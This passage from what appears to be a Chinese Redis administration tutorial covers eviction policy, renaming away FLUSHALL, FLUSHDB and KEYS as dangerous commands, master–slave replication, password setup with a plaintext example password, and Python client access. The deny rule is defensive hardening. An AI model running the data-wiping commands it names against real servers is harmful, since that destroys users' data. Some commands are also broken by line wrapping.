    127.0.0.1:6379> keys *
    (empty list or set)
    127.0.0.1:6379> exit
    [root@Redis01 ~]# for line in `seq -w 2000`;do redis-cli set key_${line} value_
    ${line};done

    [root@Redis01 ~]# redis-cli info


    到达了内存限制,已经不允许再往里面写了。

    12.5 设置删除算法

    将删除算法设置为volatile-lru

    127.0.0.1:6379> config get maxmemory-policy
    1) "maxmemory-policy"
    2) "noeviction"
    127.0.0.1:6379> config set maxmemory-policy volatile-lru
    OK
    127.0.0.1:6379> config get maxmemory-policy
    1) "maxmemory-policy"
    2) "volatile-lru"
    127.0.0.1:6379> config rewrite
    OK
    127.0.0.1:6379> get key_0111
    "value_0111"
    127.0.0.1:6379> expire key_0111 3600
    (integer) 1
    127.0.0.1:6379> ttl key_0111
    (integer) -2
    127.0.0.1:6379> get key_0111
    (nil)

    说明:由上述测试可以发现volatile-lru算法,当内存到了最大值以后,会优先删除有过期时间的key。

    十三,Redis禁用屏蔽危险命令

    13.1 redis禁用的命令

    FLUSHALL和FLUSHDB会清除redis的数据,比较危险 
    KEYS在键过多的时候使用会阻塞业务请求

    13.2 redis禁用危险命令配置代码如下(写入配置文件即可,此配置无法平滑更新)

    rename-command  FLUSHALL " " #将命令改名成空

    rename-command  FLUSHDB " "  #将命令改名成空

    rename-command  KEYS " "     #将命令改名成空

    [root@Redis01 ~]# echo 'rename-command  FLUSHALL ""' >> /usr/local/redis/conf/r
    edis.conf[root@Redis01 ~]# echo 'rename-command  FLUSHDB ""' >> /usr/local/redis/conf/re
    dis.conf[root@Redis01 ~]# echo 'rename-command  KEYS ""' >> /usr/local/redis/conf/redis
    .conf[root@Redis01 ~]# tail -3 /usr/local/redis/conf/redis.conf
    rename-command  FLUSHALL ""
    rename-command  FLUSHDB ""
    rename-command  KEYS ""

    13.3 登陆redis,运行禁止命令进行测试

    重启redis-server
    [root@Redis01 ~]# redis-cli shutdown
    [root@Redis01 ~]# redis-server /usr/local/redis/conf/redis.conf
    测试被屏蔽的危险命令
    如果测试本地不让登录了,如下图:

    日志显示

    因为我之前用过flushdb这个命令,aof记录了这个命令,如果要改名aof就不认识了

    重写一下aof

    十四,Redis主从服务器环境的搭建

    主机名

    IP

    用途

    Redis01

    10.1.1.146

    Redis-master

    Redis02

    10.1.1.147

    Redis-slaveA

    Redis03

    10.1.1.148

    Redis-slaveB

    14.1 环境要求与redis基础编译部署调优

    操作系统环境要求

    三台redis都进行编译安装,三台都进行配置文件优化和简单的基础调优,三台的redis-server都启动

    过程略,前面有写

    基础调优设置:

    [root@Redis03 redis]# echo "* - nofile 10240" >> /etc/security/limits.conf
    [root@Redis03 redis]# echo "net.core.somaxconn = 10240" >> /etc/sysctl.conf
    [root@Redis03 redis]# echo "vm.overcommit_memory = 1" >> /etc/sysctl.conf
    [root@Redis03 redis]# sysctl -p
    net.core.somaxconn = 10240
    vm.overcommit_memory = 1
    [root@Redis03 redis]# echo never > /sys/kernel/mm/transparent_hugepage/enabled
    [root@Redis03 redis]# echo never > /sys/kernel/mm/transparent_hugepage/defrag
    [root@Redis03 redis]# echo 'echo never > /sys/kernel/mm/transparent_hugepage/enabled'>>/etc/rc.local

    [root@Redis03 redis]# echo 'echo never > /sys/kernel/mm/transparent_hugepage/defrag' >> /etc/rc.local

    14.2 redis主从同步服务器搭建

    redis的主从同步,不用修改master任何配置 
    只需要在redis-slave上指定master的IP地址即可

    先启动redis-master,将主的日志清空  > /data/redis/redis.log  一会主要是想看看日志信息的。然后再在两个redis-slave上都进行如下操作
    [root@Redis02 redis]# redis-cli shutdown
    [root@Redis02 redis]# echo "SLAVEOF 10.1.1.146 6379" >> /usr/local/redis/conf/redis.conf

    [root@Redis02 redis]# tail -1 /usr/local/redis/conf/redis.conf
    SLAVEOF 10.1.1.146 6379
    [root@Redis02 redis]# > /data/redis/redis.log
    [root@Redis02 redis]# redis-server /usr/local/redis/conf/redis.conf
    [root@Redis02 redis]# ss -antup | grep redis
    tcp    LISTEN     0      1024      *:6379                  *:*                 
      users:(("redis-server",pid=1449,fd=6))tcp    ESTAB      0      0      10.1.1.147:33796              10.1.1.146:6379  
                  users:(("redis-server",pid=1449,fd=7))

    14.3 主从同步日志分析(全量同步)查看redis-slave同步日志,查看redis-slave同步日志
    查看日志信息:略,自己能看懂就行,看不懂百度单词,工作中是会经常看redis的日志信息的

    keys *    从库里也有了数据

    redis的主从复制原理:是在后台起一个进程并生成一个rdb文件,来把当前这个时刻的所有的内存数据给BGSAVE到内存里,并不是写到硬盘上,然后把这个rdb文件给从,redis的第一次同步方式都是全量同步,就是把所有数据都给从库

    14.4 主从同步日志分析(部分同步)

    如果是从宕了,不触发半同步,从宕了之后好了再连,还是全量,如果主宕了,从库就找不着了,这个时候主宕了之后再恢复,从就会找主做增量复制,就是部分同步
    [root@Redis01 ~]# > /data/redis/redis.log
    [root@Redis01 ~]# redis-cli shutdown
    从的日志  略

    14.5 主从同步的停止

    [root@Redis02 ~]# redis-cli
    127.0.0.1:6379> slaveof no one
    OK
    127.0.0.1:6379>
    [root@Redis02 ~]# cat /data/redis/redis.log

    恢复主从

    127.0.0.1:6379> slaveof 10.1.1.146 6379
    OK

    14.6 加密的主从同步

    1)为redis-master平滑设置连接密码

    [root@Redis01 ~]# redis-cli config get requirepass
    1) "requirepass"
    2) ""
    [root@Redis01 ~]# redis-cli config set requirepass 'yunjisuan'
    OK
    [root@Redis01 ~]# redis-cli config get requirepass
    (error) NOAUTH Authentication required.
    [root@Redis01 ~]# redis-cli auth yunjisuan
    OK

    查看从库日志信息

    2)为从库提供主从同步密码验证

    从服务器需要设置主从同步的认证密码

    查看从服务器日志

    十五,使用Python操作Redis单例

    [root@Redis01 ~]# yum -y install epel-release
    [root@Redis01 ~]# yum -y install python2-pip
    [root@Redis01 ~]# pip install redis

    15.2 利用python进行redis数据的读写

    [root@Redis01 ~]# python
    Python 2.7.5 (default, Apr 11 2018, 07:36:10)
    [GCC 4.8.5 20150623 (Red Hat 4.8.5-28)] on linux2
    Type "help", "copyright", "credits" or "license" for more information.
    >>> import redis
    >>> r = redis.Redis(host='127.0.0.1',port=6379,password='yunjisuan',db=0)
    >>> r.get('key_0008')
    'value_0008'
    >>> exit()





     






  • 相关阅读:
    Flume spooldir 报错 MalformedInputException: Input length = 1
    Python股票量化投资-2.量化投资介绍
    Python股票量化投资-1.开发环境部署
    centos 8 安装 activemq5.15 开机自启动
    Hystrix 说明
    Centos 8 安装 tomcat8.5 开机自启动
    Centos 8 安装 JDK 1.8
    centos 8.0 安装 nginx-1.18.0 开机自启动
    Error LNK2019: unresolved external symbol "char * __stdcall _com_util::ConvertBSTRToString(wchar_t *)"
    如何复制DataRow(dataTabel中的行)
  • 原文地址:https://www.cnblogs.com/wsnbba/p/10223068.html
Copyright © 2020-2023  润新知